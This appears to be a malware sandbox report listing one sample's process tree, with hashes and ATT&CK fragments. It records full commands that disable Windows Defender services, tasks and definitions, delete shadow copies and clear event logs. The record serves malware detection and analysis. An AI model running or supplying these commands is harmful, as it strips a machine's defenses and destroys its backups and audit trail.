C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:792
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1924
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1712
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1680
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:880
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1156
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1260
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1348
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1508
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:572
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1060
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:2024
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:812
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1808
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:992
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:2032
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1736
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1604
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:432
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1768
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2028
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1332
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:996 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1720
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1528 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1800 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1084 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1920 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2064 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2112 -
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2196
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2220 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2232
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2252 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2312
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2332
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD58ca131ef5aa05a74a43e8883d0c9671a
SHA18335d07a953b60386e03c90011cd95b24cf5d40a
SHA256d34432df10d2131663378f26d14eb8b1e315bcc49beac4cc7fa4d33cd64433bb
SHA51276863c19096f5dedffc7cb691b184360ebd485841952f244ab0becb3b3b2dfaf8e9e04379629d6389e8789a4486520918fe8627c78345c560e14bea9bfa0bfb7